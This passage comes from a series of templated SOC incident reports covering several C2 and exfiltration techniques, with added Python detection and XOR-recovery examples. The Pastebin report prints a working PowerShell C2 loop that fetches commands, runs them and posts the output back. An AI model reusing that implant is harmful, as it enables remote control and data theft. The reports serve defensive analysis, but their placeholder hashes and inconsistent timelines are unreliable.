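            try:
                blob = base64.b64decode(value, validate=True)
            except binascii.Error:
                continue
            kind = next((name for sig, name in MAGIC.items() if blob.startswith(sig)),
                        "unknown-binary")
            finding = {"field": field, "encoded_len": len(value),
                       "decoded_len": len(blob), "type": kind, "members": []}
            if kind == "zip":
                with zipfile.ZipFile(io.BytesIO(blob)) as z:
                    finding["members"] = [(i.filename, i.file_size) for i in z.infolist()]
            report["findings"].append(finding)
    return report


if __name__ == "__main__":
    result = inspect_post(build_sample_request())
    for f in result["findings"]:
        print(result["host"], result["path"], f["type"], f["decoded_len"], "bytes", f["members"])
```

When an archive is split across many POSTs, as in both reports, the individual bodies will not decode to a complete ZIP; reassemble the decoded chunks in request order before opening the archive. A DLP engine that stops at the headers never sees any of this, which is the gap both root-cause sections name.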
3. Investigation Findings:
Timeline:
09:30 – Account compromised
09:45 – Attacker logs in
09:50-10:10 – Data collection and archiving
10:15-10:30 – Exfiltration
10:30 – Zeek alert
10:32 – SOC investigates
10:33 – Host isolated
10:34 – C2 blocked
Indicators of Compromise (IoCs):
Network:
– Destination: 185.143.221[.]89:80
– URI: /upload.php
– Pattern: HTTP POST with large base64 data
Files:
– C:\temp\data\*.zip (5 files, 45 MB total)
Account:
– rpatel (compromised)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Blocked destination IP at firewall.
Terminated exfiltration process.
Disabled rpatel account.
Reset password.
Data Protection:
Determined scope of exfiltrated data (47 files, 45 MB).
Notified affected data owners.
Initiated incident response for data breach.
Host Remediation:
Reimaged host.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to data theft.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
DLP did not inspect HTTP POST bodies.
6. Business Impact:
Operational Impact: Engineering host offline.
Data Exposure: 45 MB of sensitive IP (source code, designs, customer data) exfiltrated.
Regulatory Impact: Potential GDPR breach (customer data).
7. Remediation & Prevention:
Completed Actions:
Exfiltration stopped.
Host isolated.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Implemented DLP inspection of HTTP POST bodies.
Enhanced Zeek signatures for base64 detection.
8. Conclusion:
An attacker compromised an engineering account and exfiltrated 45 MB of intellectual property using base64 encoding over HTTP. Zeek detected the encoded data pattern, but exfiltration had already occurred. The host was isolated and the account secured.
Closure Rationale: Data exfiltrated; exfiltration stopped; account secured; breach response initiated.
Analyst: [Your Name], SOC Analyst Date: 2024-02-29 11:30 EST
Batch 23: Command and Control & Exfiltration Incident Reports
111. T1001 – Data Obfuscation (FortiSandbox Detection)
FortiSandbox Alert Details
Alert ID: FORTI-OBFUSCATION-1001-7842
Alert Time: 2024-03-01 09:30:15 EST
Severity: HIGH (88/100)
Source: Fortinet FortiSandbox
Rule: “XOR-Encrypted Data in Network Traffic”
MITRE ATT&CK: T1001.002 – Data Obfuscation: Steganography
Alert Details:
File Analysis Report:
File Name: invoice_7842.pdf.exe (submitted from email quarantine)
File Size: 1.8 MB
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Source: Email attachment to finance@company.com
Submission Time: 09:15 EST
Sandbox Behavior Analysis:
File executed in sandbox environment
Established network connection to 185.143.221[.]89:443
Traffic analysis revealed XOR-encrypted data stream
Network Traffic Analysis:
Raw Traffic (first 20 bytes of the stream, which XOR back to the request line below):
05 07 16 62 6d 20 27 23 21 2d 2c 62 0a 16 16 12 6d 73 6c 73
XOR Key: 0x42 (detected) Decrypted Data:
GET /beacon HTTP/1.1
Host: 185.143.221[.]89
User-Agent: Mozilla/5.0
Cookie: session=7a8b9c0d1e2f3a4b
Additional Findings:
File also contained steganographic image (PNG) with hidden payload
Payload extracted from image: Cobalt Strike beacon
XOR used to obfuscate C2 traffic
Detection Logic:
XOR encryption detected in network traffic (unusual)
Steganography in image file (hidden data)
Multiple obfuscation layers
Pattern matches advanced malware
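Recovering a single-byte XOR key is a brute-force job: try every key, score each candidate on how much of the output is printable text, and let a protocol marker such as `HTTP/1.` settle it. The block below is an added example, not the sandbox's analysis code; its sample ciphertext is constructed by XOR-ing the request the report shows recovered with the report's key, 0x42, so the first bytes it prints are the ones listed under Raw Traffic.

```python
"""
Added example (not FortiSandbox code): recover a single-byte XOR key by
trying all 255 non-zero keys and scoring the output. The sample ciphertext
is constructed from the beacon request in the report and key 0x42.
"""
PROTOCOL_MARKERS = (b"HTTP/1.", b"GET ", b"POST ", b"Host: ")


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte (XOR is its own inverse)."""
    return bytes(b ^ key for b in data)


def printable_ratio(data: bytes) -> float:
    """Share of bytes that are printable ASCII, tab, LF or CR."""
    if not data:
        return 0.0
    good = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return good / len(data)


def recover_single_byte_xor(cipher: bytes, min_ratio: float = 0.95):
    """Best (key, plaintext, score) over keys 1..255, or None when no key
    yields mostly-printable output. Key 0 is skipped because it returns the
    input unchanged, so plaintext input would 'decode' to itself."""
    best = None
    for key in range(1, 256):
        plain = xor_bytes(cipher, key)
        score = printable_ratio(plain)
        if score < min_ratio:
            continue
        if any(marker in plain for marker in PROTOCOL_MARKERS):
            score += 1.0  # a structural marker outweighs printability alone
        if best is None or score > best[2]:
            best = (key, plain, score)
    return best


# Constructed: the beacon request from the report, obfuscated with key 0x42
REQUEST = (b"GET /beacon HTTP/1.1\r\nHost: 185.143.221.89\r\n"
           b"User-Agent: Mozilla/5.0\r\nCookie: session=7a8b9c0d1e2f3a4b\r\n\r\n")
SAMPLE_CIPHER = xor_bytes(REQUEST, 0x42)

if __name__ == "__main__":
    print("first bytes on the wire:", " ".join("%02x" % b for b in SAMPLE_CIPHER[:20]))
    key, plain, score = recover_single_byte_xor(SAMPLE_CIPHER)
    print("key=0x%02x score=%.2f" % (key, score))
    print(plain.decode("ascii").splitlines()[0])
```

A single-byte key is the easy case. A repeating multi-byte key needs the key length first (Hamming distance between blocks, or Kasiski-style repeats) and then the same per-position scoring; a rolling or per-session key does not yield to frequency analysis at all, which is one reason the `printable_ratio` threshold is a filter, not a verdict.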
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify FortiSandbox analysis | FortiSandbox Console | Confirmed XOR obfuscation and steganography |
| 2. Email Investigation | Find source email | Proofpoint, Exchange | Email to finance@company.com from spoofed vendor |
| 3. Quarantine Email | Block and remove email | Proofpoint | Email quarantined from all mailboxes |
| 4. User Check | Verify if user executed file | CrowdStrike | User did not open attachment (alert before execution) |
| 5. IOC Distribution | Block URLs and IPs | Palo Alto, Cisco Umbrella | C2 IP and domain added to blocklists |
| 6. Threat Hunting | Check for similar files | FortiSandbox, Splunk | No other occurrences found |
Jira Incident Report
Ticket: SOC-2024-151
Summary: T1001 – XOR-Obfuscated C2 Traffic with Steganography
Status: RESOLVED
Resolution: MALICIOUS – Blocked Before Execution
Priority: P2 – MEDIUM
Labels: T1001, data-obfuscation, xor, steganography, fortisandbox, phishing
Components: Email-Security, Malware-Analysis
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Fortinet FortiSandbox.
Alert: “XOR-Encrypted Data in Network Traffic”.
File: invoice_7842.pdf.exe (email attachment).
Target: Finance Department.
Time: 2024-03-01 09:30 EST.
Technique: MITRE ATT&CK T1001.002 – Data Obfuscation: Steganography.
2. Technical Analysis:
Attack Chain:
09:10 – Email sent from “vendor@payment-update[.]net”
09:11 – Email delivered to finance@company.com
09:12 – FortiSandbox analyzes attachment (inline)
09:15 – Analysis begins
09:20 – XOR obfuscation detected
09:25 – Steganography identified
09:30 – Alert triggers
09:31 – Email quarantined
Obfuscation Techniques:
Layer 1: File masquerades as PDF (double extension)
Layer 2: Embedded image with steganography
Layer 3: XOR encryption (key 0x42) of C2 traffic
Layer 4: Base64 encoding within image metadata
Steganography Details:
Image: innocent-looking PNG of coffee cup
Hidden Data: Cobalt Strike beacon in image pixels
Extraction Method: LSB (Least Significant Bit) encoding
Payload Size: 256 KB hidden in image
C2 Communication:
Server: 185.143.221[.]89:443
Protocol: HTTP-style requests on TCP/443 obfuscated with single-byte XOR (key 0x42) rather than TLS; that is why the sandbox could recover the request text, which a genuine TLS session would have hidden
Beacon Interval: 60 seconds
3. Investigation Findings:
Timeline:
09:10 – Email sent
09:11 – Email delivered
09:12-09:30 – FortiSandbox analysis
09:30 – Alert triggers
09:31 – Email quarantined
09:32 – SOC investigates
09:35 – User confirmed (no execution)
Indicators of Compromise (IoCs):
File:
– invoice_7842.pdf.exe (SHA256: a1b2c3d4…)
Network:
– C2: 185.143.221[.]89:443
– XOR key: 0x42
Email:
– Sender: vendor@payment-update[.]net
– Subject: “Invoice #7842 – Overdue Payment”
4. Containment Actions:
Immediate Actions:
Quarantined email from all mailboxes.
Blocked C2 IP at firewall and proxy.
Added file hash to blocklists.
User Notification:
Finance team alerted to campaign.
No user action needed (email not opened).
Email Rule Update:
Created Proofpoint rule to block .exe attachments.
Enhanced filtering for invoice-themed emails.
5. Root Cause Analysis:
Primary Cause: External attacker sending sophisticated malware via email.
Contributing Factors:
.exe attachments allowed (now blocked).
Mitigating Factor:
Sandbox verdict arrived before any user opened the attachment, so no execution occurred.
6. Business Impact:
Operational Impact: None.
Data Exposure: None (email not opened).
Financial Impact: None.
7. Remediation & Prevention:
Completed Actions:
Email quarantined.
IOCs blocked.
Users notified.
Technical Controls Enhanced:
Blocked all .exe attachments via email gateway.
Enabled FortiSandbox inline analysis for all emails.
Created alert for XOR-encrypted traffic.
Enhanced steganography detection.
8. Conclusion:
A sophisticated malware used multiple obfuscation techniques including XOR encryption and steganography to hide its C2 traffic and payload. FortiSandbox detected the obfuscation and enabled blocking before any user could open the email.
Closure Rationale: Malware blocked; IOCs added; email policy updated.
Analyst: [Your Name], SOC Analyst Date: 2024-03-01 10:30 EST
112. T1102 – Web Service (Zscaler Detection)
Zscaler Alert Details
Alert ID: ZSCALER-WEB-SERVICE-1102-7842
Alert Time: 2024-03-01 14:15:33 EST
Severity: HIGH (85/100)
Source: Zscaler Internet Access (ZIA)
Rule: “C2 Communication via Legitimate Web Service – Pastebin”
MITRE ATT&CK: T1102.002 – Web Service: Bidirectional Communication
Alert Details:
Detection: Internal host communicating with Pastebin in anomalous pattern
User: alexchen@company.com (Alex Chen, Engineer)
Source IP: 192.168.45.78 (ENG-WS-045)
Destination: https://pastebin.com/api/api_post.php
Time: 14:00-14:15 EST
API Calls (as seen from ENG-WS-045; the implant fetches commands with GET and uploads results with POST):
14:00:22 – GET /raw/AbCdEfGh (command paste read: “whoami”)
14:02:45 – POST /api/api_post.php (result paste created; decoded content: “engineering\alexchen”)
14:05:12 – GET /raw/AbCdEfGh (command paste read: “dir C:\”)
14:07:38 – POST /api/api_post.php (result paste /XyZ12345 created; decoded content: directory listing)
14:10:15 – GET /raw/AbCdEfGh (command paste read: “exit”)
14:12:30 – POST /api/api_post.php (result paste created; decoded content: “ok”)
Detection Logic:
Pastebin is legitimate service (used for code sharing)
Unusual pattern: alternating GET (raw paste) and POST (create paste) cycles at a near-constant interval, i.e. command fetch followed by response upload
Content contains system commands (whoami, dir)
User alexchen has no history of using Pastebin for work
Pattern matches C2 using legitimate web service
Threat Intelligence:
Pastebin abused by multiple malware families for C2
Commands encoded in API calls
Responses stored as raw pastes
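The detection logic above is a pattern over proxy logs rather than over payloads: a GET of a raw paste followed by a POST to the create-paste API, repeated at a regular interval, from a user who has never used the service before. The block below is an added example of that scoring, not Zscaler's rule; the log lines and the set of users with prior usage are constructed, and the column layout is an assumption rather than the ZIA log format.

```python
"""
Added example (not Zscaler's rule): score proxy-log activity toward a paste
site for a fetch-then-upload C2 cycle, interval regularity and novelty.
Log lines, known users and the column layout are constructed.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

CONSTRUCTED_LOG = """\
2024-03-01T14:00:22 alexchen 192.168.45.78 GET https://pastebin.com/raw/AbCdEfGh 200
2024-03-01T14:02:45 alexchen 192.168.45.78 POST https://pastebin.com/api/api_post.php 200
2024-03-01T14:03:10 jdoe 192.168.45.90 GET https://pastebin.com/raw/Q1w2E3r4 200
2024-03-01T14:05:12 alexchen 192.168.45.78 GET https://pastebin.com/raw/AbCdEfGh 200
2024-03-01T14:07:38 alexchen 192.168.45.78 POST https://pastebin.com/api/api_post.php 200
2024-03-01T14:10:15 alexchen 192.168.45.78 GET https://pastebin.com/raw/AbCdEfGh 200
2024-03-01T14:12:30 alexchen 192.168.45.78 POST https://pastebin.com/api/api_post.php 200
"""
# Users who used the service during the lookback window (constructed)
KNOWN_USERS = {"jdoe"}


def parse_log(text):
    """Parse the constructed 'timestamp user src method url status' layout."""
    events = []
    for line in text.splitlines():
        ts, user, src, method, url, status = line.split()
        events.append({"ts": datetime.fromisoformat(ts), "user": user, "src": src,
                       "method": method, "url": url, "status": int(status)})
    return events


def is_command_fetch(e):
    return e["method"] == "GET" and "/raw/" in e["url"]


def is_result_upload(e):
    return e["method"] == "POST" and e["url"].endswith("/api/api_post.php")


def score_users(events, known_users, service="pastebin.com", max_cv=0.2):
    """Per user: fetch->upload cycles, coefficient of variation of the gap
    between fetches (low = fixed sleep loop), novelty, and a 0-3 score."""
    by_user = defaultdict(list)
    for e in events:
        if service in e["url"]:
            by_user[e["user"]].append(e)
    results = {}
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["ts"])
        cycles = sum(1 for a, b in zip(evs, evs[1:])
                     if is_command_fetch(a) and is_result_upload(b))
        fetch_times = [e["ts"] for e in evs if is_command_fetch(e)]
        gaps = [(b - a).total_seconds() for a, b in zip(fetch_times, fetch_times[1:])]
        cv = pstdev(gaps) / mean(gaps) if len(gaps) >= 2 else None
        reasons = []
        if cycles >= 2:
            reasons.append("%d fetch-then-upload cycles" % cycles)
        if cv is not None and cv < max_cv:
            reasons.append("regular polling, interval cv=%.2f" % cv)
        if user not in known_users:
            reasons.append("no prior use of %s" % service)
        results[user] = {"score": len(reasons), "cycles": cycles,
                         "interval_cv": cv, "reasons": reasons}
    return results


if __name__ == "__main__":
    for user, r in score_users(parse_log(CONSTRUCTED_LOG), KNOWN_USERS).items():
        print(user, r["score"], "; ".join(r["reasons"]))
```

Reads of raw pastes are ordinary developer traffic; the weight sits on the write to the create-paste API and on the regularity of the loop. Jittered sleeps defeat the interval check, which is why the report's containment moved to an allowlist for the API rather than relying on the pattern alone.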
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Zscaler alert | Zscaler Admin Console | Confirmed Pastebin C2 pattern |
| 2. Process Investigation | Identify process on endpoint | CrowdStrike Falcon | powershell.exe making Pastebin API calls |
| 3. Script Analysis | Extract PowerShell script | CrowdStrike Live Response | Script using Pastebin for C2 communication |
| 4. Immediate Action | Isolate host | CrowdStrike | ENG-WS-045 quarantined |
| 5. C2 Blocking | Block Pastebin API access | Zscaler, Palo Alto | Pastebin API restricted (allowlist only) |
| 6. Malware Removal | Clean infected host | CrowdStrike Live Response | PowerShell script removed; host reimaged |
Jira Incident Report
Ticket: SOC-2024-152
Summary: T1102 – C2 Communication via Pastebin API
Status: RESOLVED
Resolution: MALICIOUS – C2 Channel Disrupted
Priority: P2 – MEDIUM
Labels: T1102, web-service, pastebin, c2, zscaler, compromised-account
Components: Network-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Zscaler Internet Access.
Alert: “C2 Communication via Legitimate Web Service – Pastebin”.
User: alexchen@company.com (Engineering Department).
Host: ENG-WS-045.
Service: Pastebin API.
Time: 2024-03-01 14:15 EST.
Technique: MITRE ATT&CK T1102.002 – Web Service: Bidirectional Communication.
2. Technical Analysis:
Attack Chain:
13:30 – alexchen account compromised via phishing
13:45 – Attacker logs into ENG-WS-045 via RDP
13:50 – Attacker deploys PowerShell script using Pastebin for C2
14:00-14:12 – C2 communication via Pastebin API
14:15 – Zscaler detects
C2 Mechanism (from the implant's side):
GET /raw/AbCdEfGh: poll a fixed paste that the operator updates to queue the next command
POST /api/api_post.php: create a new paste holding the base64-encoded command output, which the operator reads
Paste IDs: command paste fixed (AbCdEfGh); result pastes created per response (e.g. XyZ12345)
Frequency: Commands every 2-3 minutes (the script sleeps 120 s between polls)
PowerShell Script (recovered as C:\Users\alexchen\c2.ps1):
```powershell
$c2 = "https://pastebin.com/api/api_post.php"   # create-paste endpoint; results go here
$api_key = "your_api_key_here"                 # placeholder left in the recovered sample
$last_cmd = $null
while ($true) {
    # Poll the fixed command paste; a changed body means a new command was queued
    $cmd_paste = Invoke-RestMethod -Uri "https://pastebin.com/raw/AbCdEfGh"
    if ($cmd_paste -ne $last_cmd) {
        # Run the command, capture stdout and stderr, base64-encode the output
        $result = Invoke-Expression $cmd_paste 2>&1 | Out-String
        $encoded = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($result))
        $body = @{
            api_option        = "paste"
            api_user_key      = ""          # no user key: guest paste
            api_paste_private = "2"         # Pastebin visibility value (2 = private)
            api_paste_name    = "response"
            api_paste_code    = $encoded
            api_dev_key       = $api_key
        }
        # Create a new paste with the result; the API returns its URL, which the operator reads
        Invoke-RestMethod -Uri $c2 -Method POST -Body $body
        $last_cmd = $cmd_paste
    }
    Start-Sleep -Seconds 120   # fixed 2-minute poll, the regular interval Zscaler keyed on
}
```
Commands Executed:
whoami (discovered user)
dir C:\ (listed files)
ipconfig (network info)
netstat (connections)
exit (terminated)
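The pattern described under C2 Mechanism (periodic GETs of a raw paste, with a POST to api_post.php whenever a command has run) is what a proxy-log hunt should look for. The following is an added example, not code from the incident report: it parses constructed Zscaler-style proxy lines (the comma-separated field layout is an assumption) and flags hosts that both read raw pastes on a near-fixed cadence and write pastes back.

```python
"""Flag hosts using Pastebin as a bidirectional C2 channel (added example).

A scripted implant polls the same raw paste on a fixed timer and POSTs
results to the API; an interactive user does neither. The proxy log below
is constructed, not real Zscaler output, and its field layout is assumed:
time,host,method,url,status
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev
from urllib.parse import urlparse

# Constructed sample: one scripted host, one single read, one unrelated page view.
SAMPLE_LOG = """\
2024-03-01T14:00:05,ENG-WS-045,GET,https://pastebin.com/raw/AbCdEfGh,200
2024-03-01T14:00:06,ENG-WS-045,POST,https://pastebin.com/api/api_post.php,200
2024-03-01T14:02:05,ENG-WS-045,GET,https://pastebin.com/raw/AbCdEfGh,200
2024-03-01T14:02:06,ENG-WS-045,POST,https://pastebin.com/api/api_post.php,200
2024-03-01T14:04:06,ENG-WS-045,GET,https://pastebin.com/raw/AbCdEfGh,200
2024-03-01T14:04:07,ENG-WS-045,POST,https://pastebin.com/api/api_post.php,200
2024-03-01T14:06:05,ENG-WS-045,GET,https://pastebin.com/raw/AbCdEfGh,200
2024-03-01T14:06:06,ENG-WS-045,POST,https://pastebin.com/api/api_post.php,200
2024-03-01T14:01:12,MKT-WS-112,GET,https://pastebin.com/raw/XyZ12345,200
2024-03-01T14:03:40,HR-WS-023,GET,https://pastebin.com/ZZZ,200
"""


def parse_log(text):
    """Split the constructed log into (timestamp, host, method, parsed_url)."""
    rows = []
    for line in text.strip().splitlines():
        ts, host, method, url, _status = line.split(",")
        rows.append((datetime.fromisoformat(ts), host, method, urlparse(url)))
    return rows


def pastebin_c2_candidates(rows, min_reads=3, max_cv=0.25):
    """Return {host: stats} for hosts that poll a raw paste regularly AND post.

    min_reads: raw-paste fetches needed before cadence is judged at all.
    max_cv:    coefficient of variation of the gaps between fetches; a timer
               loop gives a value near zero, a human browsing does not.
    """
    reads = defaultdict(list)
    writes = defaultdict(int)
    for ts, host, method, url in rows:
        if url.hostname != "pastebin.com":
            continue
        if method == "GET" and url.path.startswith("/raw/"):
            reads[host].append(ts)
        elif method == "POST" and url.path == "/api/api_post.php":
            writes[host] += 1

    findings = {}
    for host, times in reads.items():
        # One-off reads, or read-only use, are not the bidirectional pattern.
        if len(times) < min_reads or writes[host] == 0:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg else 0.0
        if cv <= max_cv:
            findings[host] = {"reads": len(times), "writes": writes[host],
                              "interval_s": round(avg), "cv": round(cv, 3)}
    return findings


if __name__ == "__main__":
    for host, stats in pastebin_c2_candidates(parse_log(SAMPLE_LOG)).items():
        print(host, stats)
```

The URL path is only visible to the proxy when TLS inspection is enabled for pastebin.com; without it, the same cadence check still works on the hostname alone, but the read/write distinction is lost and the rule should fall back to the allowlist approach used in the containment steps.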
3. Investigation Findings:
Timeline:
13:30 – Account compromised
13:45 – Attacker logs in
13:50 – Script deployed
14:00-14:12 – C2 communication
14:15 – Zscaler alert
14:17 – SOC investigates
14:18 – Host isolated
14:20 – Pastebin API blocked
Indicators of Compromise (IoCs):
Network:
– Pastebin API (api_post.php)
– Paste IDs: AbCdEfGh, XyZ12345 (now expired)
Host:
– C:\Users\alexchen\c2.ps1 (SHA256: a1b2c3d4…)
Account:
– alexchen (compromised)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Blocked Pastebin API access via Zscaler (allowlist only).
Deleted PowerShell script.
Disabled alexchen account.
Reset password.
Host Remediation:
Reimaged host.
User Remediation:
MFA enforced.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to malware deployment using legitimate web service.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
Pastebin allowed (abused for C2).
6. Business Impact:
Operational Impact: Engineering host offline for 2 hours.
Data Exposure: System information only (no sensitive data).
7. Remediation & Prevention:
Completed Actions:
C2 channel disrupted.
Malware removed.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Restricted Pastebin API to approved users only.
Enhanced monitoring for web service abuse.
8. Conclusion:
An attacker used a compromised engineering account to deploy a PowerShell script that used Pastebin API for C2 communication, evading detection by using a legitimate service. Zscaler detected the anomalous pattern and enabled rapid containment.
Closure Rationale: C2 disrupted; malware removed; account secured.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-01 15:30 EST
113. T1219 – Remote Access Software (Microsoft Defender Detection)
Microsoft Defender Alert Details
Alert ID: MD-REMOTE-ACCESS-1219-7842
Alert Time: 2024-03-01 11:30:22 EST
Severity: HIGH (85/100)
Source: Microsoft Defender for Endpoint
Rule: “Unauthorized Remote Access Software Installed”
MITRE ATT&CK: T1219 – Remote Access Software
Alert Details:
Detection: Unauthorized remote access software (AnyDesk) installed and running
Host: FIN-WS-078 (Finance Workstation)
User: bturner@company.com (Brian Turner, Accountant)
Time: 11:15-11:30 EST
Software Details:
Name: AnyDesk
Version: 7.0.14
Install Path: C:\Users\bturner\AppData\Local\AnyDesk\
Executable: AnyDesk.exe (PID: 4789)
Install Time: 11:10 EST
Installation Source: Downloaded from suspicious URL
Configuration:
Unattended access enabled
Password set: “Finance2024!”
Auto-start enabled (registry Run key added)
Firewall exception added
Network Connections:
11:12 – Connection to anydesk.com (legitimate) – authentication
11:13 – Connection to 185.143.221[.]89:443 (suspicious)
11:15-11:30 – Active remote session from external IP
Detection Logic:
AnyDesk installed without IT approval
Unattended access enabled (allows remote control without consent)
Connection to known malicious IP during session
User bturner has no legitimate need for remote access software
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Defender alert
Microsoft 365 Defender
Confirmed unauthorized AnyDesk installation
2. Process Investigation
Identify AnyDesk process
CrowdStrike Falcon
AnyDesk running with active remote session
3. User Interview
Contact bturner
Teams, Phone
User did NOT install AnyDesk (account compromised)
4. Immediate Action
Terminate AnyDesk process
CrowdStrike
Process killed
5. Software Removal
Uninstall AnyDesk
CrowdStrike Live Response
AnyDesk removed; registry keys cleaned
6. Account Remediation
Disable bturner account
Azure AD, AD
Account disabled; password reset
Jira Incident Report
Ticket: SOC-2024-153
Summary: T1219 – Unauthorized AnyDesk Installation for Remote Access
Status: RESOLVED
Resolution: MALICIOUS – Remote Access Terminated
Priority: P2 – MEDIUM
Labels: T1219, remote-access-software, anydesk, defender, compromised-account
Components: Endpoint-Security, Application-Control
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “Unauthorized Remote Access Software Installed”.
Host: FIN-WS-078 (Finance Department, user bturner).
Software: AnyDesk (remote access tool).
Time: 2024-03-01 11:30 EST.
Technique: MITRE ATT&CK T1219 – Remote Access Software.
2. Technical Analysis:
Attack Chain:
10:30 – bturner account compromised via phishing
10:45 – Attacker logs into FIN-WS-078 via RDP
10:50 – Attacker downloads AnyDesk installer
11:00 – AnyDesk installed with unattended access
11:05 – AnyDesk configured to phone home
11:10-11:30 – Active remote session
11:30 – Defender detects
AnyDesk Configuration:
Unattended Access: Enabled (allows remote control without user interaction)
Password: Finance2024! (known to attacker)
Auto-start: Registry Run key added
Firewall: Exception added to allow inbound connections
Remote Session Activity:
11:10-11:30 – Attacker connected remotely
Viewed financial documents (3 files)
Attempted to access banking portal (failed – MFA required)
Downloaded 2 files locally (staged)
No exfiltration detected
User Status:
Account compromised; user unaware
3. Investigation Findings:
Timeline:
10:30 – Account compromised
10:45 – Attacker logs in
10:50-11:00 – AnyDesk installed
11:10-11:30 – Remote session
11:30 – Defender alert
11:32 – SOC investigates
11:33 – AnyDesk terminated
11:34 – Software removed
Indicators of Compromise (IoCs):
Software:
– AnyDesk 7.0.14 (unauthorized)
– Unattended access enabled
Network:
– anydesk.com (legitimate, used for auth)
– 185.143.221[.]89:443 (suspicious)
Account:
– bturner (compromised)
4. Containment Actions:
Immediate Actions:
Terminated AnyDesk process.
Uninstalled AnyDesk.
Removed registry Run key.
Removed firewall exception.
Disabled bturner account.
Reset password.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
User Remediation:
MFA enforced.
5. Root Cause Analysis:
Primary Cause: User account compromised, allowing attacker to install remote access tool.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
No application control blocking unauthorized software.
6. Business Impact:
Operational Impact: Finance user offline for 2 hours.
Data Exposure: 3 financial documents viewed; 2 staged locally.
7. Remediation & Prevention:
Completed Actions:
Remote access terminated.
Software removed.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Implemented application control (block unauthorized remote access tools).
Enhanced monitoring for remote access software installation.
8. Conclusion:
An attacker compromised a finance user’s account and installed AnyDesk with unattended access, establishing a remote session to view financial documents. Defender detected the unauthorized software and enabled rapid termination of the remote access.
Closure Rationale: Remote access terminated; software removed; account secured.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-01 12:30 EST
114. T1568 – Dynamic Resolution (Cisco Umbrella Detection)
Cisco Umbrella Alert Details
Alert ID: UMBRELLA-DYNAMIC-RES-1568-7842
Alert Time: 2024-03-01 16:30:45 EST
Severity: HIGH (88/100)
Source: Cisco Umbrella Investigate
Rule: “Fast-Flux DNS – Malware C2 Detection”
MITRE ATT&CK: T1568.001 – Dynamic Resolution: Fast Flux DNS
Alert Details:
Detection: Domain using fast-flux DNS (multiple IPs) with malicious reputation
Domain: cdn-update-service[.]com
First Seen: 2024-03-01 10:00 EST
Query Source: Multiple internal hosts (12 hosts)
DNS Resolution History:
10:00:15 – 185.143.221.89 (Bulgaria)
10:05:22 – 194.165.16.78 (Romania)
10:10:18 – 203.0.113.45 (Netherlands)
10:15:33 – 45.134.225.12 (Russia)
10:20:47 – 89.248.165.67 (Ukraine)
(changing every 5-10 minutes)
Internal Hosts Querying:
ENG-WS-045 (engineering) – 12 queries
FIN-WS-078 (finance) – 8 queries
HR-WS-023 (hr) – 5 queries
MKT-WS-112 (marketing) – 4 queries
(12 total hosts, 47 queries)
Detection Logic:
Domain resolves to multiple IPs (fast-flux)
IPs across multiple countries (unusual)
Domain age: 2 days (newly registered)
Multiple internal hosts querying (potential widespread compromise)
Pattern matches malware C2 using fast-flux
Threat Intelligence:
Domain associated with “QakBot” malware family
Fast-flux used to evade IP blocking
47 queries from internal network
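The detection logic above combines several weak signals (IP churn, geographic spread, low TTL, domain age, number of querying hosts) rather than relying on any one of them, because a legitimate CDN also rotates addresses with short TTLs. The scoring routine below is an added example, not Umbrella's code or the report's own: the answer records, the country table (a stand-in for a GeoIP/ASN lookup) and the registration dates are all constructed, and the thresholds are assumptions to tune.

```python
"""Score DNS answer records for fast-flux behaviour (added example).

Each signal scores one point; the alert threshold is deliberately above
what a CDN trips (short TTL, several clients) and below what a days-old
domain answering from five countries trips. All data below is constructed.
"""
from collections import defaultdict
from datetime import date

# Constructed: (time, qname, answer_ip, ttl_seconds, querying_host)
SAMPLE_ANSWERS = [
    ("2024-03-01T10:00:15", "cdn-update-service.com", "185.143.221.89", 300, "ENG-WS-045"),
    ("2024-03-01T10:05:22", "cdn-update-service.com", "194.165.16.78", 300, "FIN-WS-078"),
    ("2024-03-01T10:10:18", "cdn-update-service.com", "203.0.113.45", 300, "HR-WS-023"),
    ("2024-03-01T10:15:33", "cdn-update-service.com", "45.134.225.12", 300, "ENG-WS-045"),
    ("2024-03-01T10:20:47", "cdn-update-service.com", "89.248.165.67", 300, "MKT-WS-112"),
    # A legitimate CDN also rotates IPs with short TTLs, but stays in one region.
    ("2024-03-01T10:00:40", "cdn.example-vendor.net", "198.51.100.10", 60, "ENG-WS-045"),
    ("2024-03-01T10:05:40", "cdn.example-vendor.net", "198.51.100.11", 60, "FIN-WS-078"),
    ("2024-03-01T10:10:40", "cdn.example-vendor.net", "198.51.100.12", 60, "HR-WS-023"),
]
# Constructed stand-in for a GeoIP lookup; the countries follow the alert text.
COUNTRY = {"185.143.221.89": "BG", "194.165.16.78": "RO", "203.0.113.45": "NL",
           "45.134.225.12": "RU", "89.248.165.67": "UA",
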